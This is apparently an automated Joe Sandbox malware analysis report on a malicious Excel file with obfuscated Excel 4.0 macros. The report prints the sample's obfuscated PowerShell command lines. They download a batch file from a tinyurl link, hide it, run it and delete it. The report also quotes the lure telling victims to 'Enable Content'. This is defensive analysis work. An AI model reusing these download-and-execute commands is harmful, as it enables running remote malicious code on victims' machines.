Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report SIN029088.xls

Overview

General Information

Sample Name:SIN029088.xls
Analysis ID:319129
MD5:483a0f4cb6a70556b34aed04f24f7962
SHA1:cbd6b0004aca06a46b4863bfbc13f444b3404483
SHA256:ccab18c2ba789320bdb50d364ce3f70a625c60c68a93ad05bbca056f9f6f821a

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Connects to a URL shortener service
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Obfuscated command line found
Sigma detected: Microsoft Office Product Spawning Windows Shell
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 5652 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • cmd.exe (PID: 5804 cmdline: cmd /c power^shell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 800 cmdline: powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • cmd.exe (PID: 5764 cmdline: cmd /c power^shell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 1720 cmdline: powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • cmd.exe (PID: 5860 cmdline: cmd /c power^shell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 912 cmdline: powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • attrib.exe (PID: 5400 cmdline: 'C:\Windows\system32\attrib.exe' +s +h pd.bat MD5: A5540E9F87D4CB083BDF8269DEC1CFF9)
    • cmd.exe (PID: 2992 cmdline: cmd /c power^shell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 4824 cmdline: powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • cmd.exe (PID: 4972 cmdline: cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat') MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 1564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 5344 cmdline: powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat') MD5: DBA3E6449E97D4E3DF64527EF7012A10)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
SIN029088.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x10dc2:$s1: Excel
  • 0x3408:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: cmd /c power^shell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', CommandLine: cmd /c power^shell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5652, ProcessCommandLine: cmd /c power^shell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', ProcessId: 5804
Sigma detected: Hiding Files with Attrib.exeShow sources
Source: Process startedAuthor: Sami Ruohonen: Data: Command: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, CommandLine: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\attrib.exe, NewProcessName: C:\Windows\SysWOW64\attrib.exe, OriginalFileName: C:\Windows\SysWOW64\attrib.exe, ParentCommandLine: powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 912, ProcessCommandLine: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, ProcessId: 5400

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: SIN029088.xlsVirustotal: Detection: 7%Perma Link
Source: SIN029088.xlsVirustotal: Detection: 7%Perma Link
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00C799DE FindFirstFileNameTransactedW,12_2_00C799DE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00C79C6E FindFirstFileNameTransactedW,12_2_00C79C6E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00C799DE FindFirstFileNameTransactedW,12_2_00C799DE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00C79C6E FindFirstFileNameTransactedW,12_2_00C79C6E

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exeJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exeJump to behavior
Source: global trafficDNS query: name: tinyurl.com
Source: global trafficDNS query: name: tinyurl.com
Source: global trafficTCP traffic: 192.168.2.3:49688 -> 104.20.139.65:443
Source: global trafficTCP traffic: 192.168.2.3:49688 -> 104.20.139.65:443
Source: global trafficTCP traffic: 192.168.2.3:49688 -> 104.20.139.65:443
Source: global trafficTCP traffic: 192.168.2.3:49688 -> 104.20.139.65:443

Networking:

barindex
Connects to a URL shortener serviceShow sources
Source: unknownDNS query: name: tinyurl.com
Source: unknownDNS query: name: tinyurl.com
Source: unknownDNS query: name: tinyurl.com
Source: unknownDNS query: name: tinyurl.com
Source: Joe Sandbox ViewIP Address: 104.20.139.65 104.20.139.65
Source: Joe Sandbox ViewIP Address: 104.20.139.65 104.20.139.65
Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: powershell.exe, 0000000F.00000002.458513367.0000000005988000.00000004.00000001.sdmpString found in binary or memory: <noscript><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=196261077476671&ev=PageView&nos equals www.facebook.com (Facebook)
Source: powershell.exe, 0000000F.00000002.458557491.000000000599F000.00000004.00000001.sdmp, pd.bat.15.drString found in binary or memory: <noscript><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=196261077476671&ev=PageView&noscript=1"/></noscript> equals www.facebook.com (Facebook)
Source: powershell.exe, 0000000F.00000002.458513367.0000000005988000.00000004.00000001.sdmpString found in binary or memory: <noscript><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=196261077476671&ev=PageView&nos equals www.facebook.com (Facebook)
Source: powershell.exe, 0000000F.00000002.458557491.000000000599F000.00000004.00000001.sdmp, pd.bat.15.drString found in binary or memory: <noscript><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=196261077476671&ev=PageView&noscript=1"/></noscript> equals www.facebook.com (Facebook)
Source: unknownDNS traffic detected: queries for: tinyurl.com
Source: unknownDNS traffic detected: queries for: tinyurl.com
Source: powershell.exe, 0000000F.00000002.458513367.0000000005988000.00000004.00000001.sdmpString found in binary or memory: http://35.180.137.10/bat/scriptxls_4ebe5706-12b0-4bb2-89a9-a17fc5300f70_snowj1917.bat
Source: powershell.exe, 0000000F.00000002.466631450.0000000009C30000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncRSACA-2.crt0
Source: powershell.exe, 0000000C.00000002.453215743.0000000007970000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.478692982.0000000003216000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000000F.00000002.466631450.0000000009C30000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncRSACA-2.crl07
Source: powershell.exe, 0000000F.00000002.466631450.0000000009C30000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: powershell.exe, 0000000F.00000002.466631450.0000000009C30000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncRSACA-2.crl0L
Source: powershell.exe, 00000006.00000002.457598759.00000000065B2000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.468695260.00000000064D3000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.445995476.0000000005C95000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000F.00000002.466631450.0000000009C30000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 0000000F.00000002.466631450.0000000009C30000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
Source: powershell.exe, 0000000F.00000002.453245282.0000000005565000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000006.00000002.441613141.0000000005551000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.461718645.0000000005471000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.434434476.0000000004C31000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.480221111.00000000050F1000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.449944220.0000000005421000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000F.00000002.458341120.0000000005968000.00000004.00000001.sdmpString found in binary or memory: http://tinyurl.com
Source: powershell.exe, 0000000F.00000002.453245282.0000000005565000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000F.00000002.458557491.000000000599F000.00000004.00000001.sdmp, pd.bat.15.drString found in binary or memory: https://api.pushnami.com/scripts/v1/pushnami-adv/5c018cb890535b0010a5ea87
Source: powershell.exe, 0000000F.00000002.458513367.0000000005988000.00000004.00000001.sdmp, pd.bat.15.drString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
Source: powershell.exe, 0000000C.00000002.445995476.0000000005C95000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000C.00000002.445995476.0000000005C95000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000C.00000002.445995476.0000000005C95000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000F.00000002.453245282.0000000005565000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000006.00000003.402281824.0000000005F86000.00000004.00000001.sdmp, powershell.exe, 00000009.00000003.412229988.0000000005E9B000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.444126941.00000000054C6000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000003.415829479.0000000005B1B000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.454341121.000000000562A000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000006.00000002.457598759.00000000065B2000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.468695260.00000000064D3000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.445995476.0000000005C95000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000F.00000002.458513367.0000000005988000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.458341120.0000000005968000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: pd.bat.15.drString found in binary or memory: https://tinyurl.com
Source: powershell.exe, 0000000F.00000002.458341120.0000000005968000.00000004.00000001.sdmp, pd.bat.15.drString found in binary or memory: https://tinyurl.com/
Source: powershell.exe, 0000000F.00000002.458513367.0000000005988000.00000004.00000001.sdmpString found in binary or memory: https://tinyurl.com/app/nospam/tinyurl.com/y252oqq3/terminated
Source: powershell.exe, 0000000F.00000002.458557491.000000000599F000.00000004.00000001.sdmp, pd.bat.15.drString found in binary or memory: https://tinyurl.com/favicon.ico
Source: PowerShell_transcript.302494.O2kFUmpi.20201118025653.txt.15.drString found in binary or memory: https://tinyurl.com/y252oqq3
Source: powershell.exe, 0000000F.00000002.458239803.000000000595A000.00000004.00000001.sdmpString found in binary or memory: https://tinyurl.com4#f
Source: powershell.exe, 0000000F.00000002.466631450.0000000009C30000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: powershell.exe, 0000000F.00000002.458513367.0000000005988000.00000004.00000001.sdmpString found in binary or memory: http://35.180.137.10/bat/scriptxls_4ebe5706-12b0-4bb2-89a9-a17fc5300f70_snowj1917.bat
Source: powershell.exe, 0000000F.00000002.466631450.0000000009C30000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncRSACA-2.crt0
Source: powershell.exe, 0000000C.00000002.453215743.0000000007970000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.478692982.0000000003216000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000000F.00000002.466631450.0000000009C30000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncRSACA-2.crl07
Source: powershell.exe, 0000000F.00000002.466631450.0000000009C30000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: powershell.exe, 0000000F.00000002.466631450.0000000009C30000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncRSACA-2.crl0L
Source: powershell.exe, 00000006.00000002.457598759.00000000065B2000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.468695260.00000000064D3000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.445995476.0000000005C95000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000F.00000002.466631450.0000000009C30000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 0000000F.00000002.466631450.0000000009C30000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
Source: powershell.exe, 0000000F.00000002.453245282.0000000005565000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000006.00000002.441613141.0000000005551000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.461718645.0000000005471000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.434434476.0000000004C31000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.480221111.00000000050F1000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.449944220.0000000005421000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000F.00000002.458341120.0000000005968000.00000004.00000001.sdmpString found in binary or memory: http://tinyurl.com
Source: powershell.exe, 0000000F.00000002.453245282.0000000005565000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000F.00000002.458557491.000000000599F000.00000004.00000001.sdmp, pd.bat.15.drString found in binary or memory: https://api.pushnami.com/scripts/v1/pushnami-adv/5c018cb890535b0010a5ea87
Source: powershell.exe, 0000000F.00000002.458513367.0000000005988000.00000004.00000001.sdmp, pd.bat.15.drString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
Source: powershell.exe, 0000000C.00000002.445995476.0000000005C95000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000C.00000002.445995476.0000000005C95000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000C.00000002.445995476.0000000005C95000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000F.00000002.453245282.0000000005565000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000006.00000003.402281824.0000000005F86000.00000004.00000001.sdmp, powershell.exe, 00000009.00000003.412229988.0000000005E9B000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.444126941.00000000054C6000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000003.415829479.0000000005B1B000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.454341121.000000000562A000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000006.00000002.457598759.00000000065B2000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.468695260.00000000064D3000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.445995476.0000000005C95000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000F.00000002.458513367.0000000005988000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.458341120.0000000005968000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: pd.bat.15.drString found in binary or memory: https://tinyurl.com
Source: powershell.exe, 0000000F.00000002.458341120.0000000005968000.00000004.00000001.sdmp, pd.bat.15.drString found in binary or memory: https://tinyurl.com/
Source: powershell.exe, 0000000F.00000002.458513367.0000000005988000.00000004.00000001.sdmpString found in binary or memory: https://tinyurl.com/app/nospam/tinyurl.com/y252oqq3/terminated
Source: powershell.exe, 0000000F.00000002.458557491.000000000599F000.00000004.00000001.sdmp, pd.bat.15.drString found in binary or memory: https://tinyurl.com/favicon.ico
Source: PowerShell_transcript.302494.O2kFUmpi.20201118025653.txt.15.drString found in binary or memory: https://tinyurl.com/y252oqq3
Source: powershell.exe, 0000000F.00000002.458239803.000000000595A000.00000004.00000001.sdmpString found in binary or memory: https://tinyurl.com4#f
Source: powershell.exe, 0000000F.00000002.466631450.0000000009C30000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49688
Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49688
Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Document image extraction number: 0Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
Source: Document image extraction number: 0Screenshot OCR: Enable Content"
Source: Document image extraction number: 1Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
Source: Document image extraction number: 1Screenshot OCR: Enable Content"
Source: Document image extraction number: 0Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
Source: Document image extraction number: 0Screenshot OCR: Enable Content"
Source: Document image extraction number: 1Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
Source: Document image extraction number: 1Screenshot OCR: Enable Content"
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: SIN029088.xlsInitial sample: EXEC
Source: SIN029088.xlsInitial sample: EXEC
Found obfuscated Excel 4.0 MacroShow sources
Source: SIN029088.xlsInitial sample: High usage of CHAR() function: 60
Source: SIN029088.xlsInitial sample: High usage of CHAR() function: 60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0307D0C09_2_0307D0C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0307A6E79_2_0307A6E7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0307BA509_2_0307BA50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0307D0C09_2_0307D0C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_030777509_2_03077750
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0307B6F89_2_0307B6F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_03075CD99_2_03075CD9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_03075CE89_2_03075CE8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_031D00409_2_031D0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_031DE6209_2_031DE620
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_031DAFA89_2_031DAFA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_031DE6209_2_031DE620
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_031DE6209_2_031DE620
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_031DA6409_2_031DA640
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_031D00409_2_031D0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_031D65809_2_031D6580
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_031DB4E09_2_031DB4E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_031D59B89_2_031D59B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0307D0C09_2_0307D0C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0307A6E79_2_0307A6E7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0307BA509_2_0307BA50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0307D0C09_2_0307D0C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_030777509_2_03077750
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0307B6F89_2_0307B6F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_03075CD99_2_03075CD9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_03075CE89_2_03075CE8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_031D00409_2_031D0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_031DE6209_2_031DE620
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_031DAFA89_2_031DAFA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_031DE6209_2_031DE620
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_031DE6209_2_031DE620
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_031DA6409_2_031DA640
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_031D00409_2_031D0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_031D65809_2_031D6580
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_031DB4E09_2_031DB4E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_031D59B89_2_031D59B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00C0260812_2_00C02608
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00C7B0B012_2_00C7B0B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00C7960812_2_00C79608
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00C7C72012_2_00C7C720
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00C799DE12_2_00C799DE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00C770A012_2_00C770A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00C751C812_2_00C751C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00C751B812_2_00C751B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00C7C72012_2_00C7C720
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00C79C6E12_2_00C79C6E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00C76C3012_2_00C76C30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00C7AD5812_2_00C7AD58
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00EF5B3012_2_00EF5B30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00EF178812_2_00EF1788
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00EF49B012_2_00EF49B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00EF5B2012_2_00EF5B20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00EF5B3012_2_00EF5B30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00F72CC814_2_00F72CC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_035F633715_2_035F6337
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_035F7AD815_2_035F7AD8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_035FC9D015_2_035FC9D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_035F004015_2_035F0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_035F633715_2_035F6337
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_035F18A815_2_035F18A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_035FC9D015_2_035FC9D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_035FC9D015_2_035FC9D0
